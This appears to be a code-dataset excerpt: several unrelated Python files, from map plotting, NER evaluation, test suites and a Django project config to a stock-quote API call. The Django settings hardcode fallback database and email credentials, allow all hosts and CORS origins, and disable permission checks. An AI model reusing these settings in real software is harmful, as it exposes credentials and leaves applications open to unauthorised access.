file_path = "{}/gaode_arrow.html".format(out_dir)
map_osm.save(file_path)
return
def tencent_hexagon_with_number(out_dir="../../out"):
"""腾讯地图,带数字的六边形集合"""
map_osm = folium.Map(location=[31.32, 120.63], zoom_start=12, subdomains="012")
locs = [[31.387113, 120.929393], [31.364861, 120.609265], [31.226864, 120.511118],
[31.269273, 120.750024], [31.264751, 120.598769], [31.299345, 120.742185],
]
marker_cluster = MarkerCluster().add_to(map_osm)
for loc in locs:
folium.Marker(loc,
popup='Add popup text here.',
).add_to(marker_cluster)
file_path = "{}/tencent_hexagon_with_number.html".format(out_dir)
map_osm.save(file_path)
def tencent_hello(out_dir="../../out"):
"""腾讯地图,带数字的六边形集合"""
map_osm = folium.Map(location=[31.32, 120.63], zoom_start=12)
locs = [[31.387113, 120.929393], [31.364861, 120.609265], [31.226864, 120.511118],
[31.269273, 120.750024], [31.264751, 120.598769], [31.299345, 120.742185],
]
for loc in locs:
folium.Marker(loc).add_to(map_osm)
folium.PolyLine(
locs,
fill_color='high',
fill=True,
fill_opacity=0.6,
stroke=False).add_to(map_osm)
file_path = "{}/tencent_hello.html".format(out_dir)
map_osm.save(file_path)
def tencent_rotated_marker(out_dir="../../out"):
map_osm = folium.Map(location=[31.32, 120.63], zoom_start=12)
locs = [[31.387113, 120.929393], [31.364861, 120.609265], [31.226864, 120.511118],
[31.269273, 120.750024], [31.264751, 120.598769], [31.299345, 120.742185],
]
for loc in locs:
RotatedMarker(loc, rotation_angle=45
).add_to(map_osm)
folium.PolyLine(
locs,
fill_color='high',
fill=True,
fill_opacity=0.6,
stroke=False).add_to(map_osm)
file_path = "{}/tencent_rotated_marker.html".format(out_dir)
map_osm.save(file_path)
def tencent_directed_line(out_dir="../../out"):
map_osm = folium.Map(location=[31.32, 120.63], zoom_start=12)
lines = [
([31.387113, 120.929393], [31.364861, 120.609265]),
([31.269273, 120.750024], [31.226864, 120.511118]),
]
for line in lines:
# _line = folium.PolyLine(
# line,
# weight=10,
# color='#8EE9FF'
# ).add_to(map_osm)
# # attr = {'fill': 'red'}
# attr = {'font-weight': 'bold', 'font-size': '24', 'fill': 'red'}
#
# PolyLineTextPath(_line,
# #text='\u25BA', # 三角形
# #text='\u2708', # 飞机
# text='►',
# repeat=False,
# offset=6,
# center=True,
# orientation=0,
# attributes=attr
# ).add_to(map_osm)
#
_line = DirectedLine(
src=line[0],
dst=line[1],
weight=10,
color='#8EE9FF'
).add_to(map_osm)
# _line = DirectedLine(
# src=lines[0][0],
# dst=lines[0][1],
# weight=10,
# #color='#8EE9FF'
# color='black'
# ).add_to(map_osm)
file_path = "{}/tencent_directed_line.html".format(out_dir)
map_osm.save(file_path)
if __name__ == "__main__":
print()
tencent_marker()
tencent_polyline()
tencent_marker_with_number()
tencent_marker_cluster()
tencent_hexagon_with_number()
gaode_arrow()
tencent_hello()
tencent_rotated_marker()
tencent_directed_line()
| 6,995 | 3,276 |
from random import choices
import explainaboard.error_analysis as ea
import numpy
import pickle
import codecs
import os
def read_data(corpus_type, fn, column_no=-1, delimiter=' '):
print('corpus_type', corpus_type)
word_sequences = list()
tag_sequences = list()
total_word_sequences = list()
total_tag_sequences = list()
with codecs.open(fn, 'r', 'utf-8') as f:
lines = f.readlines()
curr_words = list()
curr_tags = list()
for k in range(len(lines)):
line = lines[k].strip()
if len(line) == 0 or line.startswith('-DOCSTART-'): # new sentence or new document
if len(curr_words) > 0:
word_sequences.append(curr_words)
tag_sequences.append(curr_tags)
curr_words = list()
curr_tags = list()
continue
strings = line.split(delimiter)
word = strings[0].strip()
tag = strings[column_no].strip() # be default, we take the last tag
# tag='B-'+tag
tag = tag + "-W"
curr_words.append(word)
curr_tags.append(tag)
total_word_sequences.append(word)
total_tag_sequences.append(tag)
if k == len(lines) - 1:
word_sequences.append(curr_words)
tag_sequences.append(curr_tags)
# if verbose:
# print('Loading from %s: %d samples, %d words.' % (fn, len(word_sequences), get_words_num(word_sequences)))
# return word_sequences, tag_sequences
return total_word_sequences, total_tag_sequences, word_sequences, tag_sequences
def get_aspect_value(test_word_sequences, test_true_tag_sequences, test_word_sequences_sent,
test_true_tag_sequences_sent, dict_precomputed_path, dict_aspect_func):
def get_sentential_value(test_true_tag_sequences_sent, test_word_sequences_sent):
eDen = []
sentLen = []
for i, test_sent in enumerate(test_true_tag_sequences_sent):
pred_chunks = set(ea.get_chunks(test_sent))
num_entityToken = 0
for pred_chunk in pred_chunks:
idx_start = pred_chunk[1]
idx_end = pred_chunk[2]
num_entityToken += idx_end - idx_start
# introduce the entity token density in sentence ...
eDen.append(float(num_entityToken) / len(test_sent))
# introduce the sentence length in sentence ...
sentLen.append(len(test_sent))
return eDen, sentLen
dict_precomputed_model = {}
for aspect, path in dict_precomputed_path.items():
print("path:\t" + path)
if ea.os.path.exists(path):
print('load the hard dictionary of entity span in test set...')
fread = open(path, 'rb')
dict_precomputed_model[aspect] = pickle.load(fread)
else:
raise ValueError("can not load hard dictionary" + aspect + "\t" + path)
dict_span2aspect_val = {}
for aspect, fun in dict_aspect_func.items():
dict_span2aspect_val[aspect] = {}
eDen_list, sentLen_list = get_sentential_value(test_true_tag_sequences_sent,
test_word_sequences_sent)
dict_pos2sid = ea.get_pos2sentid(test_word_sequences_sent)
dict_ap2rp = ea.get_token_position(test_word_sequences_sent)
all_chunks = ea.get_chunks(test_true_tag_sequences)
dict_span2sid = {}
dict_chunkid2span = {}
for span_info in all_chunks:
# print(span_info)
# span_type = span_info[0].lower()
# print(span_type)
idx_start = span_info[1]
idx_end = span_info[2]
span_cnt = ''.join(test_word_sequences[idx_start:idx_end]).lower()
# print(span_cnt.encode("utf-8").decode("utf-8"))
span_cnt = span_cnt.encode("gbk", "ignore").decode("gbk", "ignore")
# print(sys.getdefaultencoding())
span_type = ''.join(test_true_tag_sequences[idx_start:idx_end])
span_pos = str(idx_start) + "|||" + str(idx_end) + "|||" + span_type
if len(span_type) != (idx_end - idx_start):
print(idx_start, idx_end)
print(span_info)
print(span_type + "\t" + span_cnt)
print("--------------")
# print(span_pos)
# print(span_info)
# print(span_cnt)
span_length = idx_end - idx_start
# span_token_list = test_word_sequences[idx_start:idx_end]
# span_token_pos_list = [str(pos) + "|||" + span_type for pos in range(idx_start, idx_end)]
# print(span_token_pos_list)
span_sentid = dict_pos2sid[idx_start]
sLen = float(sentLen_list[span_sentid])
dict_span2sid[span_pos] = span_sentid
text_sample = "".join(test_word_sequences_sent[span_sentid])
text_sample = text_sample
dict_chunkid2span[span_pos] = span_cnt + "|||" + text_sample
# Sentence Length: sLen
aspect = "sLen"
if aspect in dict_aspect_func.keys():
dict_span2aspect_val[aspect][span_pos] = sLen
# Entity Length: eLen
aspect = "eLen"
if aspect in dict_aspect_func.keys():
dict_span2aspect_val[aspect][span_pos] = float(span_length)
# Tag: tag
aspect = "tag"
if aspect in dict_aspect_func.keys():
dict_span2aspect_val[aspect][span_pos] = span_type
# print(dict_span2aspect_val)
return dict_span2aspect_val, dict_span2sid, dict_chunkid2span
def evaluate(task_type="ner", analysis_type="single", systems=[], dataset_name = 'dataset_name', model_name = 'model_name', output_filename="./output.json", is_print_ci=False,
is_print_case=False, is_print_ece=False):
path_text = systems[0] if analysis_type == "single" else ""
path_comb_output = "model_name" + "/" + path_text.split("/")[-1]
dict_aspect_func, dict_precomputed_path, obj_json = ea.load_task_conf(task_dir=os.path.dirname(__file__))
list_text_sent, list_text_token = ea.read_single_column(path_text, 0)
list_true_tags_sent, list_true_tags_token = ea.read_single_column(path_text, 1)
list_pred_tags_sent, list_pred_tags_token = ea.read_single_column(path_text, 2)
dict_span2aspect_val, dict_span2sid, dict_chunkid2span = get_aspect_value(list_text_token, list_true_tags_token,
list_text_sent, list_true_tags_sent,
dict_precomputed_path, dict_aspect_func)
dict_span2aspect_val_pred, dict_span2sid_pred, dict_chunkid2span_pred = get_aspect_value(list_text_token,
list_pred_tags_token,
list_text_sent,
list_pred_tags_sent,
dict_precomputed_path,
dict_aspect_func)
holistic_performance = ea.f1(list_true_tags_sent, list_pred_tags_sent)["f1"]
confidence_low_overall, confidence_up_overall = 0, 0
if is_print_ci:
confidence_low_overall, confidence_up_overall = compute_confidence_interval_f1(dict_span2sid.keys(),
dict_span2sid_pred.keys(),
dict_span2sid,
dict_span2sid_pred,
n_times=10)
print("confidence_low_overall:\t", confidence_low_overall)
print("confidence_up_overall:\t", confidence_up_overall)
print("------------------ Holistic Result")
print(holistic_performance)
# print(f1(list_true_tags_token, list_pred_tags_token)["f1"])
dict_bucket2span = {}
dict_bucket2span_pred = {}
dict_bucket2f1 = {}
aspect_names = []
error_case_list = []
for aspect, func in dict_aspect_func.items():
# print(aspect, dict_span2aspect_val[aspect])
dict_bucket2span[aspect] = ea.select_bucketing_func(func[0], func[1], dict_span2aspect_val[aspect])
# print(aspect, dict_bucket2span[aspect])
# exit()
dict_bucket2span_pred[aspect] = ea.bucket_attribute_specified_bucket_interval(dict_span2aspect_val_pred[aspect],
dict_bucket2span[aspect].keys())
dict_bucket2f1[aspect], error_case_list = get_bucket_f1(dict_bucket2span[aspect],
dict_bucket2span_pred[aspect], dict_span2sid,
dict_span2sid_pred, dict_chunkid2span,
dict_chunkid2span_pred, list_true_tags_token,
list_pred_tags_token, is_print_ci, is_print_case)
aspect_names.append(aspect)
print("aspect_names: ", aspect_names)
# for v in error_case_list:
# print(v)
print("------------------ Breakdown Performance")
for aspect in dict_aspect_func.keys():
ea.print_dict(dict_bucket2f1[aspect], aspect)
print("")
# Calculate databias w.r.t numeric attributes
dict_aspect2bias = {}
for aspect, aspect2Val in dict_span2aspect_val.items():
if type(list(aspect2Val.values())[0]) != type("string"):
dict_aspect2bias[aspect] = numpy.average(list(aspect2Val.values()))
print("------------------ Dataset Bias")
for k, v in dict_aspect2bias.items():
print(k + ":\t" + str(v))
print("")
dict_fine_grained = {}
for aspect, metadata in dict_bucket2f1.items():
dict_fine_grained[aspect] = []
for bucket_name, v in metadata.items():
# print("---------debug--bucket name old---")
# print(bucket_name)
bucket_name = ea.beautify_interval(bucket_name)
# print("---------debug--bucket name new---")
# print(bucket_name)
# bucket_value = format(v[0]*100,'.4g')
bucket_value = format(float(v[0]) * 100, '.4g')
n_sample = v[1]
confidence_low = format(float(v[2]) * 100, '.4g')
confidence_up = format(float(v[3]) * 100, '.4g')
error_entity_list = v[4]
# instantiation
dict_fine_grained[aspect].append({"bucket_name": bucket_name, "bucket_value": bucket_value, "num": n_sample,
"confidence_low": confidence_low, "confidence_up": confidence_up,
"bucket_error_case": error_entity_list[
0:int(len(error_entity_list) / 10)]})
obj_json["task"] = task_type
obj_json["data"]["name"] = dataset_name
obj_json["data"]["language"] = "Chinese"
obj_json["data"]["bias"] = dict_aspect2bias
obj_json["model"]["name"] = model_name
obj_json["model"]["results"]["overall"]["performance"] = holistic_performance
obj_json["model"]["results"]["overall"]["confidence_low"] = confidence_low_overall
obj_json["model"]["results"]["overall"]["confidence_up"] = confidence_up_overall
obj_json["model"]["results"]["fine_grained"] = dict_fine_grained
# Save error cases: overall
obj_json["model"]["results"]["overall"]["error_case"] = error_case_list[0:int(len(error_case_list) / 10)]
ea.save_json(obj_json, output_filename)
def compute_confidence_interval_f1(spans_true, spans_pred, dict_span2sid, dict_span2sid_pred, n_times=1000):
n_data = len(dict_span2sid)
sample_rate = ea.get_sample_rate(n_data)
n_sampling = int(n_data * sample_rate)
print("sample_rate:\t", sample_rate)
print("n_sampling:\t", n_sampling)
dict_sid2span_salient = {}
for span in spans_true:
# print(span)
if len(span.split("|||")) != 3:
break
sid = dict_span2sid[span]
if sid in dict_sid2span_salient.keys():
dict_sid2span_salient[sid].append(span)
else:
dict_sid2span_salient[sid] = [span]
dict_sid2span_salient_pred = {}
for span in spans_pred:
sid = dict_span2sid_pred[span]
if sid in dict_sid2span_salient_pred.keys():
dict_sid2span_salient_pred[sid].append(span)
else:
dict_sid2span_salient_pred[sid] = [span]
performance_list = []
confidence_low, confidence_up = 0, 0
for i in range(n_times):
sample_index_list = choices(range(n_data), k=n_sampling)
true_label_bootstrap_list = []
pred_label_bootstrap_list = []
for ind, sid in enumerate(sample_index_list):
if sid in dict_sid2span_salient.keys():
true_label_list = dict_sid2span_salient[sid]
true_label_list_revised = [true_label + "|||" + str(ind) for true_label in true_label_list]
true_label_bootstrap_list += true_label_list_revised
if sid in dict_sid2span_salient_pred.keys():
pred_label_list = dict_sid2span_salient_pred[sid]
pred_label_list_revised = [pred_label + "|||" + str(ind) for pred_label in pred_label_list]
pred_label_bootstrap_list += pred_label_list_revised
f1, p, r = ea.evaluate_chunk_level(pred_label_bootstrap_list, true_label_bootstrap_list)
performance_list.append(f1)
if n_times != 1000:
confidence_low, confidence_up = ea.mean_confidence_interval(performance_list)
else:
performance_list.sort()
confidence_low = performance_list[24]
confidence_up = performance_list[974]
# print("\n")
# print("confidence_low:\t", confidence_low)
# print("confidence_up:\t", confidence_up)
return confidence_low, confidence_up
def get_error_case_segmentation(dict_pos2tag, dict_pos2tag_pred, dict_chunkid2span_sent, dict_chunkid2span_sent_pred,
list_true_tags_token, list_pred_tags_token):
error_case_list = []
for pos, tag in dict_pos2tag.items():
true_label = tag
pred_label = ""
# print(dict_chunkid2span_sent.keys())
if pos + "|||" + tag not in dict_chunkid2span_sent.keys():
continue
span_sentence = dict_chunkid2span_sent[pos + "|||" + tag]
if pos in dict_pos2tag_pred.keys():
pred_label = dict_pos2tag_pred[pos]
if true_label == pred_label:
continue
# print(pos + "\t" + true_label + "\t" + pred_label)
else:
start = int(pos.split("|||")[0])
end = int(pos.split("|||")[1])
pred_label = "".join(list_pred_tags_token[start:end])
# print(pred_label)
error_case = span_sentence + "|||" + true_label + "|||" + pred_label
error_case_list.append(error_case)
for pos, tag in dict_pos2tag_pred.items():
true_label = ""
pred_label = tag
if pos + "|||" + tag not in dict_chunkid2span_sent_pred.keys():
continue
span_sentence = dict_chunkid2span_sent_pred[pos + "|||" + tag]
if pos in dict_pos2tag.keys():
true_label = dict_pos2tag[pos]
if true_label == pred_label:
continue
else:
start = int(pos.split("|||")[0])
end = int(pos.split("|||")[1])
true_label = "".join(list_true_tags_token[start:end])
error_case = span_sentence + "|||" + true_label + "|||" + pred_label
error_case_list.append(error_case)
# for v in error_case_list:
# print(len(error_case_list))
# print(v)
# print(error_case_list)
return error_case_list
def get_bucket_f1(dict_bucket2span, dict_bucket2span_pred, dict_span2sid, dict_span2sid_pred, dict_chunkid2span,
dict_chunkid2span_pred, list_true_tags_token, list_pred_tags_token, is_print_ci, is_print_case):
dict_bucket2f1 = {}
# predict: 2_3 -> NER
dict_pos2tag_pred = {}
if is_print_case:
for k_bucket_eval, spans_pred in dict_bucket2span_pred.items():
for span_pred in spans_pred:
pos_pred = "|||".join(span_pred.split("|||")[0:2])
tag_pred = span_pred.split("|||")[-1]
dict_pos2tag_pred[pos_pred] = tag_pred
# true: 2_3 -> NER
dict_pos2tag = {}
if is_print_case:
for k_bucket_eval, spans in dict_bucket2span.items():
for span in spans:
pos = "|||".join(span.split("|||")[0:2])
tag = span.split("|||")[-1]
dict_pos2tag[pos] = tag
error_case_list = []
if is_print_case:
error_case_list = get_error_case_segmentation(dict_pos2tag, dict_pos2tag_pred, dict_chunkid2span,
dict_chunkid2span_pred, list_true_tags_token,
list_pred_tags_token)
# print(len(error_case_list))
# print(error_case_list)
for bucket_interval, spans_true in dict_bucket2span.items():
spans_pred = []
if bucket_interval not in dict_bucket2span_pred.keys():
raise ValueError("Predict Label Bucketing Errors")
else:
spans_pred = dict_bucket2span_pred[bucket_interval]
confidence_low, confidence_up = 0, 0
if is_print_ci:
confidence_low, confidence_up = compute_confidence_interval_f1(spans_true, spans_pred, dict_span2sid,
dict_span2sid_pred)
confidence_low = format(confidence_low, '.3g')
confidence_up = format(confidence_up, '.3g')
f1, p, r = ea.evaluate_chunk_level(spans_pred, spans_true)
error_entity_list = []
if is_print_case:
for span_true in spans_true:
if span_true not in spans_pred:
# print(span_true)
pos_true = "|||".join(span_true.split("|||")[0:2])
tag_true = span_true.split("|||")[-1]
if pos_true in dict_pos2tag_pred.keys():
tag_pred = dict_pos2tag_pred[pos_true]
if tag_pred != tag_true:
error_entity_list.append(
dict_chunkid2span[span_true] + "|||" + tag_true + "|||" + dict_pos2tag_pred[pos_true])
# print(dict_chunkid2span[span_true] + "|||" + tag_true + "|||" + dict_pos2tag_pred[pos_true])
else:
start = int(pos_true.split("|||")[0])
end = int(pos_true.split("|||")[1])
pred_label = "".join(list_pred_tags_token[start:end])
error_entity_list.append(dict_chunkid2span[span_true] + "|||" + tag_true + "|||" + pred_label)
# print(dict_chunkid2span[span_true] + "|||" + tag_true + "|||" + pred_label)
dict_bucket2f1[bucket_interval] = [f1, len(spans_true), confidence_low, confidence_up, error_entity_list]
# if bucket_interval[0] == 1.0:
# print("debug-f1:",f1)
# print(spans_pred[0:20])
# print(spans_true[0:20])
# print("dict_bucket2f1: ",dict_bucket2f1)
return ea.sort_dict(dict_bucket2f1), error_case_list | 19,804 | 6,397 |
import os
from pathlib import Path
from unittest import TestCase
import validator.validator as validator
from .test_utils import schema, build_map
class TestDefault(TestCase):
old_cwd = os.getcwd()
@classmethod
def setUpClass(cls):
os.chdir('./tests/workspaces/default')
@classmethod
def tearDownClass(cls):
os.chdir(cls.old_cwd)
def test_doubleQuotation(self):
(status, successful, failed, ignored) = validator.validate_cwd(
'"failing/failing-validation.version"', schema, build_map)
self.assertEqual(status, 0)
def test_invalidWorkspace_recursive(self):
(status, successful, failed, ignored) = validator.validate_cwd('', schema, build_map)
self.assertEqual(status, 1)
def test_exclusionWildcard(self):
(status, successful, failed, ignored) = validator.validate_cwd('failing/*.version', schema, build_map)
self.assertEqual(status, 0)
self.assertSetEqual(successful, {Path('default.version'), Path('recursiveness/recursive.version'),
Path('recursiveness/recursiveness2/recursive2.version')})
self.assertSetEqual(ignored, {Path('failing/failing-validation.version')})
self.assertEqual(failed, set())
def test_excludeAll(self):
(status, successful, failed, ignored) = validator.validate_cwd('["./**/*"]', schema, build_map)
self.assertEqual(status, 0)
self.assertSetEqual(successful, set())
self.assertSetEqual(ignored, {Path('default.version'),
Path('failing/failing-validation.version'),
Path('recursiveness/recursive.version'),
Path('recursiveness/recursiveness2/recursive2.version')})
self.assertEqual(failed, set())
def test_recursiveExclusion(self):
(status, successful, failed, ignored) = validator.validate_cwd('["./recursiveness/**/*"]',
schema, build_map)
self.assertEqual(status, 1)
self.assertSetEqual(successful, {Path('default.version')})
self.assertSetEqual(ignored, {Path('recursiveness/recursive.version'),
Path('recursiveness/recursiveness2/recursive2.version')})
self.assertEqual(failed, {Path('failing/failing-validation.version')})
def test_multipleExclusions(self):
(status, successful, failed, ignored) = validator.validate_cwd('["./*.version", "./failing/*"]',
schema, build_map)
self.assertEqual(status, 0)
self.assertSetEqual(successful, {Path('recursiveness/recursive.version'),
Path('recursiveness/recursiveness2/recursive2.version')})
self.assertSetEqual(ignored, {Path('default.version'), Path('failing/failing-validation.version')})
self.assertEqual(failed, set())
| 3,045 | 849 |
import threading
import sys
import time
class WaitingThread(threading.Thread):
def __init__(self, lp, waitTime = 5):
threading.Thread.__init__(self)
self.running = True
self.waitCondition = threading.Condition(threading.RLock())
self.waitTime = waitTime
self.lastTime = None
def setWaitTime(self, time):
self.waitCondition.acquire()
self.waitTime = time
self.waitCondition.release()
def isRunning(self):
self.waitCondition.acquire()
isRunningNow = self.running
self.waitCondition.release()
return isRunningNow
def stop(self):
self.waitCondition.acquire()
self.running = False
self.waitCondition.notify()
self.waitCondition.release()
def run(self):
now = time.time()
self.lastTime = now
self.doWork(now)
while self.isRunning():
self.onstep()
now = time.time()
timeToWait = (self.lastTime + self.waitTime) - now
if(timeToWait <= 0):
self.doWork(now)
else:
print("Sleep: ", timeToWait," seconds")
self.waitCondition.acquire()
self.waitCondition.wait(timeToWait)
self.waitCondition.release()
def doWork(self, now):
deltaTime = now - self.lastTime
self.execute(deltaTime)
self.lastTime = now
def getLastTime(self):
return self.lastTime
def execute(self, deltaTime):
pass
def onstep(self):
pass
| 1,586 | 449 |
import pytest
from helpers.utils import cleanup_k8s, helm_install, wait_for_pods_to_be_ready
HELM_INSTALL_CMD = """
helm upgrade \
--install \
-f ../../ci/values/kubetest/test_posthog_hpa_enabled.yaml \
--timeout 30m \
--create-namespace \
--namespace posthog \
posthog ../../charts/posthog \
--wait-for-jobs \
--wait
"""
def test_helm_install(kube):
cleanup_k8s()
helm_install(HELM_INSTALL_CMD)
wait_for_pods_to_be_ready(kube)
| 476 | 198 |
"""
Django settings for dental project.
Generated by 'django-admin startproject' using Django 2.0.
For more information on this file, see
https://docs.djangoproject.com/en/2.0/topics/settings/
For the full list of settings and their values, see
https://docs.djangoproject.com/en/2.0/ref/settings/
"""
import os
import datetime
import logging
import logging.config
# from django.utils.log import DEFAULT_LOGGING
# Disable Django's logging setup
LOGGING_CONFIG = None
# CELERY_BROKER_URL = 'redis://redis:6379'
# CELERY_RESULT_BACKEND = 'redis://redis:6379'
# CELERY_ACCEPT_CONTENT = ['application/json']
# CELERY_TASK_SERIALIZER = 'json'
# CELERY_RESULT_SERIALIZER = 'json'
# Build paths inside the project like this: os.path.join(BASE_DIR, ...)
BASE_DIR = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))
# Quick-start development settings - unsuitable for production
# See https://docs.djangoproject.com/en/2.0/howto/deployment/checklist/
# SECURITY WARNING: keep the secret key used in production secret!
SECRET_KEY = os.environ.get('SECRET_KEY')
# SECURITY WARNING: don't run with debug turned on in production!
DEBUG = os.environ.get('DEBUG', False)
ALLOWED_HOSTS = ['*']
AUTH_USER_MODEL = 'userapp.User'
# Application definition
INTERNAL_APPS = [
'django.contrib.admin',
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.messages',
'django.contrib.staticfiles',
]
THIRD_PARTY_APPS = [
'rest_framework',
'rest_framework.authtoken',
'debug_toolbar',
'django_extensions',
'corsheaders',
'django_filters',
'nepali',
'import_export',
]
# All apps developed at AmejPay goes here
DEV_APPS = [
"addressapp",
"userapp",
"patientapp",
"encounterapp",
"treatmentapp",
]
INSTALLED_APPS = INTERNAL_APPS + THIRD_PARTY_APPS + DEV_APPS
MIDDLEWARE = [
# 'django.middleware.cache.UpdateCacheMiddleware',
'corsheaders.middleware.CorsMiddleware',
'django.middleware.security.SecurityMiddleware',
'django.contrib.sessions.middleware.SessionMiddleware',
'django.middleware.common.CommonMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
'django.middleware.clickjacking.XFrameOptionsMiddleware',
'debug_toolbar.middleware.DebugToolbarMiddleware',
# 'django.middleware.cache.FetchFromCacheMiddleware',
]
ROOT_URLCONF = 'dental.urls'
TEMPLATES = [
{
'BACKEND': 'django.template.backends.django.DjangoTemplates',
'DIRS': ['templates'],
'APP_DIRS': True,
'OPTIONS': {
'context_processors': [
'django.template.context_processors.debug',
'django.template.context_processors.request',
'django.contrib.auth.context_processors.auth',
'django.contrib.messages.context_processors.messages',
],
},
},
]
WSGI_APPLICATION = 'dental.wsgi.application'
# api integrantion
CORS_ORIGIN_ALLOW_ALL = True
# Database
# https://docs.djangoproject.com/en/2.0/ref/settings/#databases
# DATABASES = {
# 'default': {
# 'ENGINE': 'django.db.backends.sqlite3',
# 'NAME': os.path.join(BASE_DIR, 'db.sqlite3'),
# }
# }
DATABASES = {
'default': {
'ENGINE': os.environ.get(
'DATABASE_ENGINE', 'django.db.backends.mysql'
),
'NAME': os.environ.get('DATABASE_NAME', 'abhiyantrik_db'),
'USER': os.environ.get('DATABASE_USER', 'abhiyantrik'),
'HOST': os.environ.get('DATABASE_HOST', 'db'),
'PORT': os.environ.get('DATABASE_PORT', 3306),
'PASSWORD': os.environ.get(
'DATABASE_PASSWORD', 'abhiyantrik123'
),
}
}
CACHES = {
"default": {
"BACKEND": "django_redis.cache.RedisCache",
"LOCATION": "redis://redis:6379/0",
"OPTIONS": {
"CLIENT_CLASS": "django_redis.client.DefaultClient",
}
}
}
SESSION_ENGINE = "django.contrib.sessions.backends.cache"
SESSION_CACHE_ALIAS = "default"
# Password validation
# https://docs.djangoproject.com/en/2.0/ref/settings/#auth-password-validators
AUTH_PASSWORD_VALIDATORS = [
{
'NAME': 'django.contrib.auth.password_validation.UserAttributeSimilarityValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.MinimumLengthValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.CommonPasswordValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.NumericPasswordValidator',
},
]
# Internationalization
# https://docs.djangoproject.com/en/2.0/topics/i18n/
LANGUAGE_CODE = 'en-us'
TIME_ZONE = 'Asia/Katmandu'
USE_I18N = True
USE_L10N = True
USE_TZ = True
REST_FRAMEWORK = {
'DEFAULT_PERMISSION_CLASSES': (
# 'rest_framework.permissions.IsAuthenticated',
),
'DEFAULT_AUTHENTICATION_CLASSES': (
'rest_framework_jwt.authentication.JSONWebTokenAuthentication',
'rest_framework.authentication.SessionAuthentication',
'rest_framework.authentication.BasicAuthentication',
),
}
JWT_AUTH = {
# how long the original token is valid for
'JWT_EXPIRATION_DELTA': datetime.timedelta(days=180),
# allow refreshing of tokens
'JWT_ALLOW_REFRESH': True,
'JWT_REFRESH_EXPIRATION_DELTA': datetime.timedelta(days=360),
# this is the maximum time AFTER the token was issued that
# it can be refreshed. exprired tokens can't be refreshed.
}
# Static files (CSS, JavaScript, Images)
# https://docs.djangoproject.com/en/2.0/howto/static-files/
STATIC_URL = '/static/'
MEDIA_URL = '/media/'
DOCS_URL = '/docs/'
STATIC_ROOT = os.path.join((BASE_DIR), "static", "static")
STATICFILES_DIRS = [
os.path.join((BASE_DIR), "static"),
]
MEDIA_ROOT = os.path.join((BASE_DIR), "media")
DOCS_ROOT = os.path.join((BASE_DIR), "docs", "_build", "html")
DEFAULT_FROM_EMAIL = 'Dental Hub<abhiyantriktech@gmail.com>'
EMAIL_USE_TLS = True
EMAIL_HOST = 'smtp.gmail.com'
EMAIL_HOST_USER = 'abhiyantriktech@gmail.com'
EMAIL_HOST_PASSWORD = 'password'
EMAIL_PORT = 587
logging.config.dictConfig({
'version': 1,
'disable_existing_loggers': False,
'formatters': {
'console': {
# exact format is not important, this is the minimum information
'format': '%(asctime)s %(name)-12s %(levelname)-8s %(message)s',
},
'file': {
'format': '%(asctime)s %(name)-12s %(levelname)-8s %(message)s'
}
},
'handlers': {
# console logs to stderr
'console': {
'class': 'logging.StreamHandler',
'formatter': 'console'
},
'file': {
'level': 'DEBUG',
'class': 'logging.FileHandler',
'formatter': 'file',
'filename': os.path.join((BASE_DIR), "debug.log")
}
},
'loggers': {
# default for all undefined Python modules
'': {
'level': 'INFO',
'handlers': ['console', 'file']
},
},
})
| 7,209 | 2,520 |
# pylint: disable=missing-docstring
from __future__ import print_function
import unittest
import biograph
import biograph.variants as bgexvar
class ReadCovTestCases(unittest.TestCase):
@classmethod
def setUpClass(cls):
cls.bg = biograph.BioGraph("datasets/lambdaToyData/benchmark/father_lambda.bg")
cls.seqset = cls.bg.seqset
cls.rm = cls.bg.open_readmap()
cls.ref = biograph.Reference("datasets/lambdaToyData/benchmark/ref_lambda")
cls.reflen = cls.ref.scaffold_lens['lambda']
def test_add_ref(self):
asms = bgexvar.add_ref_assemblies(self.ref, "lambda", [], whole_ref=True, max_len=100)
asms = list(asms)
self.assertEqual(len(asms), (self.reflen // 100) + 1)
seq = biograph.Sequence()
for a in asms:
seq += a.seq
self.assertEqual(len(seq), self.reflen)
rc_asms = bgexvar.add_ref_assemblies(self.ref, "lambda", [], whole_ref=True, max_len=100,
rev_comp=True)
rc_asms = list(rc_asms)
self.assertEqual(len(rc_asms), (self.reflen // 100) + 1)
rc_seq = biograph.Sequence()
for a in rc_asms:
rc_seq += a.seq
self.assertEqual(len(rc_seq), self.reflen)
self.assertEqual(seq, rc_seq.rev_comp())
if __name__ == '__main__':
unittest.main(verbosity=2)
| 1,379 | 508 |
import requests
def get_quotes(access_token,
my_client,
symbols):
"""
Function to get quotes of a list of stocks
"""
# Convert list to string
str_symbols = ','.join(symbols)
# define our headers
header = {'Authorization':"Bearer {}".format(access_token),
"Content-Type":"application/json"}
# define the endpoint for Saved orders, including your account ID
endpoint = 'https://api.tdameritrade.com/v1/marketdata/quotes'
# payload with symbols
payload = {'symbol': str_symbols,
'apikey': my_client.key}
# make a post, NOTE WE'VE CHANGED DATA TO JSON AND ARE USING POST
content = requests.get(url = endpoint, headers = header, params=payload)
# json response
json_response = content.json()
# quote symbols
quote_symbols = list(json_response.keys())
return json_response, quote_symbols
| 924 | 270 |
from pathlib import Path
api_key_name = "api_key_cosmin"
portrait_gif = Path("devdata") / "portrait.gif"
api_base = "https://sandbox.zamzar.com/v1" # SANDBOX
# api_base = "https://api.zamzar.com/v1" # LIVE
| 210 | 93 |
import FWCore.ParameterSet.Config as cms
process = cms.Process("EwkDQM")
process.load("DQM.Physics.ewkElecDQM_cfi")
process.load("DQMServices.Core.DQM_cfg")
process.load("DQMServices.Components.DQMEnvironment_cfi")
process.DQM.collectorHost = ''
#keep the logging output to a nice level
process.load("FWCore.MessageLogger.MessageLogger_cfi")
process.MessageLogger.cerr.FwkReport.reportEvery = 1
# load the full reconstraction configuration, to make sure we're getting all needed dependencies
process.load("Configuration.StandardSequences.MagneticField_cff")
#process.load("Configuration.StandardSequences.GeometryRecoDB_cff") #old one, to use for old releases
process.load("Configuration.StandardSequences.GeometryRecoDB_cff")
process.load("Configuration.StandardSequences.FrontierConditions_GlobalTag_cff")
process.load("Configuration.StandardSequences.Reconstruction_cff")
